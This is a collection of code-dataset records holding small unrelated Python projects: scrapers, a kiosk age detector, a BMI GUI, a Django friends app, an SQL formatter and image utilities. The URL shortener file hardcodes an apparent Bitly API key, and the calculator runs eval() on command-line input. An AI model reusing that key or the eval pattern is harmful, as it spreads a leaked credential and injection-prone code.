[\"zelda.gamepedia.com\"]\n    start_urls = [f\"{base_url}/Items_in_The_Legend_of_Zelda\"]\n\n    def parse(self, response):\n        \"\"\"\n        Retrieve the links to the items\n        \"\"\"\n        selector = \"li.gallerybox .gallerytext p a::attr(href)\"\n        for href in response.css(selector).extract():\n            yield Request(f\"{self.base_url}{href}\", callback=self.parse_item)\n\n    def parse_item(self, response):\n        \"\"\"\n        Retrieve the item details\n        \"\"\"\n        name_sel = \"meta[property='og:title']::attr(content)\"\n        price_sel = \"//tr[th//text()[contains(., 'Cost(s)')]]/td/div/text()\"\n        name = response.css(name_sel).get()\n        price = response.xpath(price_sel).get()\n        if price and price.strip().isdigit():\n            yield {\"name\": name, \"price\": int(price)}\n","repo_name":"jitsejan/architecture-patterns-with-python","sub_path":"data-retrieval/crawl/spiders/zelda_items.py","file_name":"zelda_items.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"1678474232","text":"while True:\r\n    name, age, weight = input().split(' ')\r\n    age, weight = int(age), int(weight)\r\n\r\n    if name == '#' and age == 0 and weight == 0:\r\n        break\r\n\r\n    if age > 17 or weight >= 80:\r\n        club = 'Senior'\r\n    else:\r\n        club = 'Junior'\r\n    \r\n    print(name, club)","repo_name":"Yujun-Won/Algorithm","sub_path":"백준/Bronze/2083. 
럭비 클럽/럭비 클럽.py","file_name":"럭비 클럽.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11671009247","text":"import cv2\nfrom PIL import Image\nimport argparse #to use ArgumentParser\n\ndef highlightFace(net, frame, conf_threshold=0.7):\n    frameOpencvDnn=frame.copy() #copy the frame received as a parameter\n    frameHeight=frameOpencvDnn.shape[0] #number of rows of frameOpencvDnn => stored as Height\n    frameWidth=frameOpencvDnn.shape[1] #number of columns of frameOpencvDnn => stored as Width\n\n    #image preprocessing\n    blob=cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False)\n    net.setInput(blob) #set the network input (what gets fed to the model)\n    detections=net.forward()#forward pass\n\n    faceBoxes=[] #declare the list\n    #face detection\n    for i in range(detections.shape[2]): #loop because there may be several people\n        confidence=detections[0,0,i,2]\n\n        if confidence>conf_threshold:\n            x1=int(detections[0,0,i,3]*frameWidth)\n            y1=int(detections[0,0,i,4]*frameHeight)\n            x2=int(detections[0,0,i,5]*frameWidth)\n            y2=int(detections[0,0,i,6]*frameHeight)\n\n            faceBoxes.append([x1,y1,x2,y2])#store in the list\n\n            #rectangle around the face region\n            cv2.rectangle(frameOpencvDnn, (x1,y1), (x2,y2), (0,255,0), int(round(frameHeight/150)), 8)\n    return frameOpencvDnn,faceBoxes\n\n\nparser=argparse.ArgumentParser() #create an instance that can receive arguments\nparser.add_argument('--image') #register the argument to read\n\nargs=parser.parse_args() #store the parsed arguments in args\n\nfaceProto=\"opencv_face_detector.pbtxt\"\nfaceModel=\"opencv_face_detector_uint8.pb\"\n\n#age_deploy.prototxt is the model definition, age_net.caffemodel holds the trained Caffe weights // load the age prediction model\nageProto=\"age_deploy.prototxt\"\nageModel=\"age_net.caffemodel\"\n\n# mean values that go with the pretrained weights (empirically optimal values)\nMODEL_MEAN_VALUES=(78.4263377603, 87.7689143744, 114.895847746)\n\n# age bucket labels\nageList=['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']\n\n#create cv2.dnn_Net class objects\n#binary file holding the trained weights: faceModel; explicit framework description file: faceProto\nfaceNet=cv2.dnn.readNet(faceModel,faceProto)\nageNet=cv2.dnn.readNet(ageModel,ageProto)\n\nvideo=cv2.VideoCapture(args.image if args.image else 0) #VideoCapture(0 or 1) -> grabs frames in real time\npadding=20\nchild=0\nadult=0\nold=0\n\nendbreak=True\nwhile cv2.waitKey(1)<0: #wait 1 ms for a key press each frame\n    hasFrame,frame=video.read()\n    if not hasFrame:\n        cv2.waitKey()\n        break\n\n    resultImg,faceBoxes=highlightFace(faceNet,frame) #call the detector\n    if not faceBoxes:\n        print(\"No face detected\")\n\n    for faceBox in faceBoxes:\n        #crop the face image\n        face=frame[max(0,faceBox[1]-padding):min(faceBox[3]+padding,frame.shape[0]-1),\n                   max(0,faceBox[0]-padding):min(faceBox[2]+padding, frame.shape[1]-1)]\n\n        blob=cv2.dnn.blobFromImage(face, 1.0, (227,227), MODEL_MEAN_VALUES, swapRB=False)\n        # image conversion and preprocessing for age prediction\n        # the input image must be wrapped in a blob for inference (check how the model was trained and set the values accordingly)\n        # blob=cv2.dnn.blobFromImage(image, pixel scale factor, per-channel mean values to subtract (empirical), whether to swap the R and B channels)\n\n        # age prediction\n        ageNet.setInput(blob) #set the network input\n        agePreds=ageNet.forward() #forward pass\n        age=ageList[agePreds[0].argmax()]# pick the highest score\n        print(f'age: {age[1:-1]} years') #f-string to build the message\n\n        #cv2.putText(image, text, position, font, scale, color, thickness, line type)\n        # write the predicted info next to the bounding box\n        cv2.putText(resultImg, f'{age}', (faceBox[0], faceBox[1]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,255,255), 2, cv2.LINE_AA)\n        #show the image (window name, image)\n        cv2.imshow(\"Detecting age\", resultImg)\n\n#count the predictions\n    if f'{age}' == '(0-2)' or f'{age}' == '(4-6)' or f'{age}' == '(8-12)':\n        print(\"age---------------child\")\n        child+=1\n    elif f'{age}' == '(15-20)' or f'{age}' == '(25-32)' or f'{age}' == '(38-43)' or f'{age}' == '(48-53)':\n        print(\"age---------------adult\")\n        
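# one vote per frame; the bucket counters below decide the final verdict\n        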
adult+=1\n    else:\n        print(\"age---------------senior\")\n        old+=1\n\n#when the same age group has been predicted more than 10 times\n    if child>15 or adult>15 or old>15:\n        if child>10:\n            path1 = './어린이선택.png'\n            path2 = './어린이메뉴.png'\n            print(\"Result: the user is a child\")\n            endbreak=False\n            break\n\n        elif adult>10:\n            path1 = './성인선택.png'\n            path2 = './성인메뉴.png'\n            print(\"Result: the user is an adult\")\n            endbreak=False\n            break\n\n        else:\n            path1 = './노인선택.png'\n            path2 = './노인메뉴.png'\n            print(\"Result: the user is a senior\")\n            endbreak=False\n            break\n\n    if(endbreak==False):\n        break\n\n#show the screens tailored to the detected age group\n\nim1 = Image.open(path1)\nim1.show()\nim2 = Image.open(path2)\nim2.show()\n\n","repo_name":"ubeeni/sk_labs","sub_path":"age detection kiosque/gad.py","file_name":"gad.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19290571431","text":"'''\r\nThis is a program that calculates the body mass index\r\nLanguage: python\r\ncreated by: Jhon Fernando Moreno Ramírez\r\n'''\r\n\r\nimport sys\r\nfrom PyQt5 import uic\r\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QDialog, QMessageBox\r\n\r\nclass ejemplo_GUI(QMainWindow):\r\n    \r\n    def __init__(self):\r\n        super().__init__()\r\n        uic.loadUi(\"GUI/principal.ui\",self)\r\n        self.btnCalcular.clicked.connect(self.calcular)\r\n    \r\n    def diagnostico(self,res):\r\n        if res < 18.5:\r\n            return 'The patient is underweight'\r\n        elif res >=18.5 and res < 25:\r\n            return 'The patient has a normal weight'\r\n        elif res >=25 and res < 30:\r\n            return 'The patient is overweight'\r\n        else:\r\n            return 'The patient is obese'\r\n    \r\n    def calcular(self):\r\n        est=self.textEstatura.text()\r\n        pes=self.textPeso.text()\r\n        opc=self.comboBoxSeleccionar.currentText()\r\n        if est =='' or pes == '':\r\n            #diag=dialogo(self)\r\n            #diag.show()\r\n            QMessageBox.about(self,\"Error\",\"The fields must NOT be empty\")\r\n        elif opc=='cm y Kg':\r\n            cm=float(est)\r\n            kg=float(pes)\r\n            imc=kg/((cm/100)**2)\r\n            diag=self.diagnostico(imc)\r\n            frase='Your Body Mass Index is: '+str(imc)+'. Your diagnosis: '+diag\r\n            \r\n            print(\"frase type \",type(frase))\r\n            self.resultado.setPlaceholderText(str(frase))\r\n        elif opc=='pul y libras':\r\n            pul=float(est)\r\n            libras=float(pes)\r\n            imc=(libras/(pul)**2)*703\r\n            diag=self.diagnostico(imc)\r\n            frase='Your Body Mass Index is: '+str(imc)+'. Your diagnosis: '+diag\r\n            self.resultado.setPlaceholderText(str(frase))\r\n\r\nclass dialogo(QDialog):\r\n    def __init__(self ,*args, **kwargs):\r\n        super(dialogo,self).__init__(*args, **kwargs)\r\n        self.setWindowTitle(\"I am a popup\")\r\n        self.setFixedSize(200, 100)\r\n    \r\n    \r\nif __name__=='__main__':\r\n    app = QApplication(sys.argv)\r\n    GUI = ejemplo_GUI()\r\n    GUI.show()\r\n    sys.exit(app.exec_())","repo_name":"jhonfernandomoreno/imc","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22440838505","text":"#8e49668ea2fac42e2214eb6799cddcb313fa71cf\nfrom pyshorteners import Shortener\n\nAPI_KEY='8e49668ea2fac42e2214eb6799cddcb313fa71cf'\n\nobj = Shortener(api_key = API_KEY)\n\nlong_url=\"https://www.google.com/search?q=wallpaper&tbm=isch&hl=en&chips=q:wallpaper,g_1:galaxy:gHxkaGWDx2M%3D&sa=X&ved=2ahUKEwi9i-bFoZDzAhVC0nMBHV4gDXoQ4lYoBnoECAEQHA&biw=771&bih=661#imgrc=yIGiED8WIxN3lM\"\n\nshort_url= obj.bitly.short(long_url)\n\nprint(short_url)\n\nLong_url = obj.bitly.expand(short_url)\n\n# 
print(Long_url)","repo_name":"archijaiswal/Python","sub_path":"URL shortener.py","file_name":"URL shortener.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21009572980","text":"import logging\n\nfrom opendnssec_autorollover.handlers import Handler, register_handler\n\nlogger = logging.getLogger(__name__)\n\n@register_handler('null')\nclass NullHandler(Handler):\n    def run(self, changes):\n        logger.debug('ignoring changes for zone %s', self.zone)\n","repo_name":"julianbrost/opendnssec-autorollover","sub_path":"src/opendnssec_autorollover/handlers/null.py","file_name":"null.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"23170648866","text":"\"\"\"Add test fullPath\n\nRevision ID: a15291c68df0\nRevises: a6ab9b8e37b1\nCreate Date: 2023-02-27 09:06:11.562537\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a15291c68df0'\ndown_revision = 'a6ab9b8e37b1'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('tests', sa.Column('fullPath', sa.String(length=2048), nullable=True))\n    # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_column('tests', 'fullPath')\n    # ### end Alembic commands ###\n","repo_name":"David1906/Xandra","sub_path":"alembic/versions/a15291c68df0_add_test_fullpath.py","file_name":"a15291c68df0_add_test_fullpath.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7200110977","text":"# Introduction to Bioinformatics 2019/20\r\n# 7 - Nucleotides\r\nfrom h_read import FileReader\r\n\r\n\r\nclass Nucleotides:\r\n\r\n    def __init__(self):\r\n        self.data = FileReader('dataset.txt')\r\n        self.data_list = self.data.e_read()\r\n        self.A = 0\r\n        self.C = 0\r\n        self.G = 0\r\n        self.T = 0\r\n\r\n    # counts the nucleotides and stores the totals per base\r\n    def count_nucleotides(self):\r\n        try:\r\n            for nucleotide in self.data_list[0]: # Iterate through nucleotides\r\n                if nucleotide == 'A':\r\n                    self.A += 1\r\n                elif nucleotide == 'C':\r\n                    self.C += 1\r\n                elif nucleotide == 'G':\r\n                    self.G += 1\r\n                elif nucleotide == 'T':\r\n                    self.T += 1\r\n            return True\r\n        except Exception as e:\r\n            print('Exception occurred while counting nucleotides; ' + str(e))\r\n\r\n    def create_output(self):\r\n        try:\r\n            output = [self.A, self.C, self.G, self.T]\r\n            self.data.write_to_file_7('output_7_file.txt', output)\r\n            return '[OK]'\r\n        except Exception as e:\r\n            print('Exception occurred while creating the output; ' + str(e))\r\n            return '[ERROR]'\r\n\r\n\r\nif __name__ == '__main__':\r\n    nc = Nucleotides()\r\n    nc.count_nucleotides()\r\n    print(nc.create_output())\r\n","repo_name":"KlemenKrenker/SchoolProjects","sub_path":"Introduction to BioInformatics/7_Nucleotides.py","file_name":"7_Nucleotides.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26743332019","text":"import re\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nclass BookScrape:\r\n    def __init__(self):\r\n        self.url_main=\"https://books.toscrape.com/\"\r\n        self.topics=self.get_topic(self.url_main)\r\n        print(\"To retrieve a 
list of books under a topic Press \\'1\\'. \\nTo retrieve price of a book price \\'2\\'\")\r\n op_no=int(input('Enter number here: '))\r\n if op_no==1:\r\n self.get_topic_list()\r\n elif op_no ==2:\r\n self.book_price()\r\n else:\r\n print('You have entered an invalid input')\r\n\r\n def url_content(self,url):\r\n try:\r\n html = requests.get( url ).content\r\n except:\r\n print(\"Failed Internet Connection\")\r\n html_parse=BeautifulSoup(html,'html.parser')\r\n return html_parse\r\n\r\n\r\n def get_list_pages(self,url): \r\n def get_list(url): \r\n tags= self.url_content(url).findAll('h3') \r\n return tags\r\n \r\n count=2\r\n url_list=get_list(url)\r\n tag_pages=[]\r\n tag_pages+=url_list \r\n while url_list !=[]:\r\n url2=url.replace(\"index.html\",'page-'+str(count)+'.html')\r\n url_list=get_list(url2)\r\n tag_pages+=url_list \r\n count+=1\r\n books=\"\"\r\n book_ref=[]\r\n for i in tag_pages: \r\n books+=str(i.find('a')['title'])+'\\n'\r\n book_ref.append(i)\r\n return books, book_ref\r\n\r\n\r\n def get_topic(self,url): \r\n tags=self.url_content(url).find('ul', attrs={'class':\"nav nav-list\"}).find('ul').find_all('li') \r\n return tags\r\n \r\n def get_topic_list(self):\r\n b_list={}\r\n count =1\r\n topic_count=[] \r\n for i in self.topics:\r\n topic=i.text.strip()\r\n topic_count.append(count)\r\n print(str(count)+'. ',topic) \r\n b_list[count]=[topic, i.find('a')['href']]\r\n count+=1\r\n\r\n print(\"Select serial no of topic to view book records\")\r\n b=int(input('Enter number here: '))\r\n\r\n if b >=min(topic_count) and b <=max(topic_count):\r\n sel_url=self.url_main+b_list[b][1] \r\n print(\"Find below list of books for \", b_list[b][0],\"\\n\")\r\n \r\n books,_=self.get_list_pages(sel_url)\r\n print(books) \r\n else: \r\n print('Invalid Input')\r\n\r\n\r\n def get_price(self,url):\r\n tags=self.url_content(url).find('p', attrs={'class':'price_color'}).text \r\n return tags\r\n \r\n\r\n def book_price(self):\r\n topic_input=input('enter name of topic: ')\r\n book_input=input('enter book title: ')\r\n\r\n\r\n topic_search={}\r\n for i in self.topics:\r\n topic=str(i.text.strip())\r\n if topic_input.lower() in topic.lower():\r\n topic_search[topic]=i.find('a')['href']\r\n if topic_search !={}:\r\n\r\n result=[]\r\n for topic, link in topic_search.items():\r\n s_url=self.url_main+link\r\n books, book_ref=self.get_list_pages(s_url)\r\n books=books.split('\\n')\r\n for book, ref in zip(books,book_ref):\r\n if book_input.lower() in book.lower():\r\n j= re.sub('\\../',\"\",ref.find('a')['href'])\r\n j=\"https://books.toscrape.com/catalogue/\"+j\r\n price=self.get_price(j)\r\n result.append([book,price])\r\n\r\n if result !=[]:\r\n print('Here are the prices of book(s) from your search input')\r\n for i in result:\r\n print('The price of book \\''+str(i[0])+'\\' is '+str(i[1]))\r\n else:\r\n print('No item matching your book input')\r\n\r\n else:\r\n print('No item matching your topic input')\r\n\r\n\r\nBookScrape()","repo_name":"Tofunmi-creator/samples","sub_path":"Web Scraper (Online Books)/webbookscrape.py","file_name":"webbookscrape.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39573273650","text":"import re\r\n\r\nclass SqlFormatter(object):\r\n input_path = \"\"\r\n report_name = \"\"\r\n line = \"\"\r\n database = \"\"\r\n commonReplacement = {}\r\n wordsToFind = {}\r\n lastClean = {}\r\n\r\n def __init__(self, input_path, report_name, database):\r\n self.input_path 
= input_path\r\n        self.report_name = report_name\r\n        self.database = database\r\n        self.commonReplacement = {'spark.sql(\"': '', '\");': ';', '\" + database + \"': f'{self.database}', r'\\n': ' ', r'\\t': ' ', ' ,': ',', }\r\n        self.wordsToFind = {'select ': 'select\\n\\t', ', ': ',\\n\\t', ',': ',\\n\\t', ' then ': '\\n\\t\\tthen ', ' else ': '\\n\\t\\telse ', 'end': '\\n\\tend', 'from': '\\nfrom', 'inner': '\\ninner', 'left': '\\nleft', 'right': '\\nright', 'join': '\\njoin', ' on ': '\\n\\ton ', ' on(': '\\n\\ton(', ' and ': '\\n\\tand ', ' where ': '\\nwhere ', ' order ': '\\norder ', '\\n\\t\\n\\t': '\\n\\t', '\\n\\n': '\\n' } \r\n        self.lastClean = {'left \\njoin': 'left join', 'right \\njoin': 'right join', 'inner \\njoin': 'inner join', 'outer \\njoin': 'outer join'}\r\n\r\n    def format(self):\r\n        sql_file_name = f'{self.report_name}.sql'\r\n        with open(self.input_path, 'r') as f:\r\n            lines = f.readlines()\r\n\r\n        for line in lines:\r\n            with open(sql_file_name, 'a') as o:\r\n                o.write(self.replace(line) + f'\\n---------------------------------------------------------------\\n')\r\n        \r\n        self.printTables(sql_file_name, self.report_name)\r\n        \r\n    def replace(self, line):\r\n        line = line.lower()\r\n\r\n        # Common replacement for cleaning tabs, double spaces and line breaks\r\n        for x, y in self.commonReplacement.items():\r\n            line = line.replace(x, y)\r\n\r\n        while line.count('  '):\r\n            line = line.replace('  ', ' ')\r\n\r\n        for x, y in self.wordsToFind.items():\r\n            line = line.replace(x, y)\r\n\r\n        for x, y in self.lastClean.items():\r\n            line = line.replace(x, y)\r\n\r\n        return line\r\n\r\n    def printTables(self, input_file, output_file):\r\n        tables = []\r\n        with open(input_file, 'r') as f:\r\n            lines = f.readlines()\r\n\r\n        for line in lines:\r\n            line = line.lower()\r\n            table = re.search(r\"(from|join) (\\w+.\\w+)\", line)\r\n            \r\n            if(table):\r\n                tables.append(table.group(2))\r\n        \r\n        tables.sort()\r\n        tables = list(dict.fromkeys(tables))\r\n\r\n        with open(f'{output_file}-tables.txt', 'a') as f:\r\n            for x in tables:\r\n                f.write(f'{x}\\n')\r\n\r\nformatter = SqlFormatter(\"input.txt\", \"caratula_per\", \"zdm_ssso\")\r\nformatter.format()","repo_name":"facundo94/sqlFormatter","sub_path":"SlqFormatter.py","file_name":"SlqFormatter.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42126153593","text":"import sys\n\ntry:\n    # cut first element (name of the file);\n    # here we pick our operation (1st input) from the command line\n    arithmetic_operations = sys.argv[1]\n    # here we take all the numbers on which the operation will be performed\n    expression = sys.argv[2:]\n    # create a dict to map add, sub, multi and div keys to a sign\n    arithmetic = {\"add\": \"+\",\n                  \"sub\": \"-\",\n                  \"multi\": \"*\",\n                  \"div\": \"/\"}\n    # We use join to make our expression a string with\n    # spaces and then evaluate it with the function eval\n    print(eval(arithmetic[arithmetic_operations].join(sys.argv[2:])))\nexcept ZeroDivisionError:\n    print(\"Attempt to divide a number by zero\")\nexcept IndexError:\n    print(\"Incorrect input! Index error, try again\")\nexcept NameError:\n    print(\"Incorrect input! Name error, try again\")\nexcept KeyError:\n    print(\"Incorrect input! The first argument should be: add, div, multi or sub\")\nexcept SyntaxError:\n    print(\"Invalid syntax!\")\nexcept (EOFError, KeyboardInterrupt):\n    print(\"Error, incorrect input! 
Try again.\")\n\n","repo_name":"Alekssin1/first_lab_OOP","sub_path":"second_task.py","file_name":"second_task.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72301918133","text":"from django.shortcuts import render, redirect\nfrom session_register_app.models import *\n\ndef show_friends(request):\n val = request.session.get('id')\n u = Users.objects.filter(id=val)\n if u:\n context = {\n 'user': u[0],\n 'amigos':u[0].friends.all(),\n 'no_amigos':Users.objects.exclude(friends2__u_id__id=u[0].id),\n }\n # if not context['amigos']:\n # context['no_amigos'] = Users.objects.all().exclude(id=u[0].id)\n # else:\n # context['no_amigos'] = Users.objects.exclude(all__friend__id=u[0].id)\n return render(request,'friends.html', context)\n return redirect('/main')\n\ndef add_friend(request, num):\n val = request.session.get('id')\n u = Users.objects.filter(id=val)\n f = Users.objects.filter(id=num)\n if u and f:\n friend = f[0]\n user = u[0]\n Friends.objects.create(u_id=user, friend_id=friend)\n Friends.objects.create(u_id=friend, friend_id=user)\n return redirect('/friends')\n\ndef remove_friend(request, num):\n val = request.session.get('id')\n u = Users.objects.filter(id=val)\n f = Users.objects.filter(id=num)\n if u and f:\n friend = f[0]\n user = u[0]\n fr=Friends.objects.filter(u_id=user, friend_id=friend)\n fr2=Friends.objects.filter(u_id=friend, friend_id=user)\n fr.delete()\n fr2.delete()\n return redirect('/friends')\n\ndef show_user(request, num):\n val = request.session.get('id')\n u = Users.objects.filter(id=val)\n user = Users.objects.filter(id=num)\n if u and user:\n context = {\n 'user': user[0]\n }\n return render(request,'show_user.html', context)\n return redirect('/main')\n\n","repo_name":"Diego-LC/friends","sub_path":"friends_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12486993936","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n#Delete a single object based on it's bounding box information etc in the xml.\n \nimport os\nimport xml.etree.ElementTree as ET\n \norigin_ann_dir = 'xmls/' #xmls input path\nnew_ann_dir = 'new_xmls/' #xmls output path\n \nfor dirpaths, dirnames, filenames in os.walk(origin_ann_dir):\n for filename in filenames:\n if os.path.isfile(r'%s%s' %(origin_ann_dir, filename)):\n origin_ann_path = os.path.join(r'%s%s' %(origin_ann_dir, filename))\n new_ann_path = os.path.join(r'%s%s' %(new_ann_dir, filename))\n tree = ET.parse(origin_ann_path)\n \n root = tree.getroot()\n for obj in root.findall(\"object\"):\n bndbox = obj.find(\"bndbox\")\n xmin = int(bndbox.find(\"xmin\").text)\n xmax = int(bndbox.find(\"xmax\").text)\n ymin = int(bndbox.find(\"ymin\").text)\n ymax = int(bndbox.find(\"ymax\").text)\n\n #if xmin ==0 or xmax==0 or ymin ==0 or ymax ==0:\n # root.remove(obj)\n \n if xmin > xmax or ymin > ymax ==0:\n root.remove(obj)\n\n\n\n tree.write(new_ann_path)\n","repo_name":"MuhammadAsadJaved/Important-shells","sub_path":"Delete_single_object.py","file_name":"Delete_single_object.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"8225649174","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\nCreated on 1/05/2011\n\n@author: Carlos Daniel Sanchez Ramirez \n@web: 
https://github.com/ErunamoJAZZ/Visor-Unal\n'''\n\nimport Image, wx, cv, os\n\n\n\nclass ImagenActual():\n '''\n Guarda la imagen actual y su versión en escala de grises.\n Estas imagenes están en formato PIL.\n Guarda tambien el Frame padre, para poder montar las imagenes\n en ventanas.\n '''\n def SetPadre(self, padr):\n self.padre = padr\n \n def SetImagenActual(self, imgAct):\n self.ImagenActual = imgAct\n self.img_gray = imgAct.convert('L')\n \n \n def openImage(self, event):\n dlg = wx.FileDialog(None, message=u\"Seleccione un archivo de texto\",\n defaultDir=os.path.expanduser('~'), defaultFile=\".txt\",\n style=wx.OPEN | wx.CHANGE_DIR )\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPath()\n self.ImagenActual = Image.open( unicode( path.replace('\\\\','/') ) ).convert('RGB')\n dlg.Destroy()\n \n #Aquí se carga la imagen en el GUI\n #padre.bitmap_1= wx.StaticBitmap(padre.panel_para_img, -1, pilToBitmap( ImagenActual< ))\n self.padre.cargarImg(pilToBitmap( self.ImagenActual ))\n self.img_gray = self.ImagenActual.convert('L')\n\n\n\nImgActual = ImagenActual()\n\n\n\n\n\n\n'''\nPIL Image to wx.Image.\n@from: http://wiki.wxpython.org/WorkingWithImages\n'''\n#copy/paste para manejar imagenes PIL & wxImage\ndef bitmapToPil(bitmap):\n return imageToPil(bitmapToImage(bitmap))\n\ndef bitmapToImage(bitmap):\n return wx.ImageFromBitmap(bitmap)\n\ndef pilToBitmap(pil):\n return imageToBitmap(pilToImage(pil))\n\ndef pilToImage(pil):\n image = wx.EmptyImage(pil.size[0], pil.size[1])\n image.SetData(pil.convert('RGB').tostring())\n return image\n\ndef imageToPil(image):\n pil = Image.new('RGB', (image.GetWidth(), image.GetHeight()))\n pil.fromstring(image.GetData())\n return pil\n\ndef imageToBitmap(image):\n return image.ConvertToBitmap()\n#Fin del copy/paste\n\n\n'''\nPIL Image to OpenCV\n'''\ndef pil2cv_L(imgPIL):\n imgCV = cv.CreateImageHeader(imgPIL.size,cv.IPL_DEPTH_8U , 1)#cv.IPL_DEPTH_32F\n cv.SetData(imgCV, imgPIL.tostring() )\n return imgCV\n\ndef cv2pil(imgCV):\n imgPIL = Image.fromstring('L', cv.GetSize(imgCV), imgCV.tostring() )\n return imgPIL\n\n\n\n#==============================================================\n\n'''\nPseudo implementación de la función imhist() de matlab.\n'''\ndef imhist(imgPIL, acumulativo=False):\n '''\n imhist(imgPIL) -> (histImgPIL, histCV, AvgSdv)\n Resibe una imagen tipo PIL, y retorna una Tupla.\n Donde histImPIL es la imagen del histograma,\n histCV es el histograma crudo que hace OpenCV,\n y AvgSdv es una tupla con el valor medio y \n la desviación estandar.\n '''\n \n def drawHistogram(histograma, scaleX=1.0, scaleY=1.0):\n '''\n Dibuja una imagen para el histograma calculado\n '''\n #rescara el numero máximo de valores en el historial.\n (_, histMax, _, _) = cv.GetMinMaxHistValue(histograma)\n \n #crea la imagen base, y la pone negra.\n imgHist= cv.CreateImage( (scaleX*256, scaleY*64) , 8, 1)\n cv.Zero(imgHist)\n \n \n #dibuja todo el histograma\n for pix in range(0,255):\n histValue = cv.QueryHistValue_1D(histograma, pix)\n nextValue = cv.QueryHistValue_1D(histograma, pix+1)\n \n #Los puntos en python se representan como tuplas :)\n pt1 = (pix*scaleX, 64*scaleY)\n pt2 = (pix*scaleX+scaleX, 64*scaleY)\n pt3 = (pix*scaleX+scaleX, (64-nextValue*64/histMax)*scaleY)\n pt4 = (pix*scaleX, (64-histValue*64/histMax)*scaleY)\n \n #se hace una lista de tuplas\n pts = [pt1, pt2, pt3, pt4]\n \n #se dubuja con el color 255\n cv.FillConvexPoly(imgHist, pts, 255)\n \n #finalmente, se retorna la imagen(imgCV) del histograma ya dibujado. 
\n return imgHist\n \n def drawHistogramAccum(histograma, scaleX=1.0, scaleY=1.0):\n '''\n Dibuja una imagen del histograma acumulativo calculado\n '''\n #rescara el numero máximo de valores en el historial.\n #(_, histMax, _, _) = cv.GetMinMaxHistValue(histograma)\n #Una lista con los valore del histograma acumulado\n newHist=[]\n acumulacion=0.0\n for i in range(0,256):\n acumulacion = acumulacion + cv.QueryHistValue_1D(histograma, i)\n newHist.append(acumulacion)\n #para obtener el tamaño máximo luego con sort\n aux=[]\n aux[:]= newHist[:]\n aux.sort()\n histMax= aux[-1]\n \n \n #crea la imagen base, y la pone negra.\n imgHist= cv.CreateImage( (scaleX*256, scaleY*64) , 8, 1)\n cv.Zero(imgHist)\n \n \n #dibuja todo el histograma\n for pix in range(0,255):\n histValue = newHist[pix] #(histograma, pix)\n nextValue = newHist[pix+1]#cv.QueryHistValue_1D(histograma, pix+1)\n \n #Los puntos en python se representan como tuplas :)\n pt1 = (pix*scaleX, 64*scaleY)\n pt2 = (pix*scaleX+scaleX, 64*scaleY)\n pt3 = (pix*scaleX+scaleX, (64-nextValue*64/histMax)*scaleY)\n pt4 = (pix*scaleX, (64-histValue*64/histMax)*scaleY)\n \n #se hace una lista de tuplas\n pts = [pt1, pt2, pt3, pt4]\n \n #se dubuja con el color 255\n cv.FillConvexPoly(imgHist, pts, 255)\n \n #finalmente, se retorna la imagen(imgCV) del histograma ya dibujado. \n return imgHist\n \n #===================\n #creación del histograma vacío (es como un array)\n rangos = [[0,255]]\n hist = cv.CreateHist([256], cv.CV_HIST_ARRAY, rangos, 1)\n \n #pasar de pil a cv\n src= pil2cv_L(imgPIL)\n \n #calculando el histograma\n cv.CalcHist([cv.GetImage(src)] , hist, 0) \n \n #=== FINAL ===\n #retorna Tupla (imgPIL, histCV, AvgSdv), este ultimo, es el valor medio y la desviación estandar\n if not acumulativo:\n return (cv2pil( drawHistogram(hist,2,5) ), hist, cv.AvgSdv(cv.GetImage(src)))\n else:\n return (cv2pil( drawHistogramAccum(hist,2,5) ), hist, cv.AvgSdv(cv.GetImage(src)))\n 